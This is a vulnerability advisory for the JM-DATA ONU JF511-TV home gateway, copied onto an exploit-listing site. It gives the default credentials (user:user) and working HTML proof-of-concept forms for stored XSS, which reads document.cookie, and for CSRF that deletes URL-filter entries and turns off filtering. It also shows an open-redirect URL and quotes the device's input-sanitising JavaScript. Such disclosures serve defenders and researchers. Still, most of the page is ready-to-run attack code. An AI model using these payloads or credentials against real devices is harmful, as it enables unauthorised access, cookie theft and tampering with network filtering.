Advertisement






JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect

CVE Category Price Severity
N/A CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')) N/A Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2022-06-20
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060058

Below is a copy:

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities


Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
                  1.0.62
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15


Vulnerability discovered by Neurogenesia
                            @zeroscience


Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php


24.04.2022

--


Default credentials:
--------------------
user:user


Stored XSS / HTML Injection:
----------------------------
<html>
  <body>
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
      <input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />
      <input type="hidden" name="action" value="ad" />
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>


CSRF (delete IP entry filter):
------------------------------
<html>
  <body>
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
      <input type="hidden" name="bcdata" value="ld3:idxi0eee" />
      <input type="hidden" name="action" value="rm" />
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
      <input type="submit" value="Go" />
    </form>

    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
      <input type="hidden" name="urlfilterEnble" value="off" />
      <input type="hidden" name="action" value="rm" />
      <input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />
      <input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>


Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk


common.js:
----------
/*
 * isCharUnsafe - test a character whether is unsafe
 * @c: character to test
 */
function isCharUnsafe(c)
{
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1
    || c.charCodeAt(0) <= 32
    || c.charCodeAt(0) >= 123;
}

/*
 * isIncludeInvalidChar - test a string whether includes invalid characters
 * @s: string to test
 */
function isIncludeInvalidChar(s)
{
  var i;

  for (i = 0; i < s.length; i++) {
    if (isCharUnsafe(s.charAt(i)) == true)
      return true;
  }

  return false;
}

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum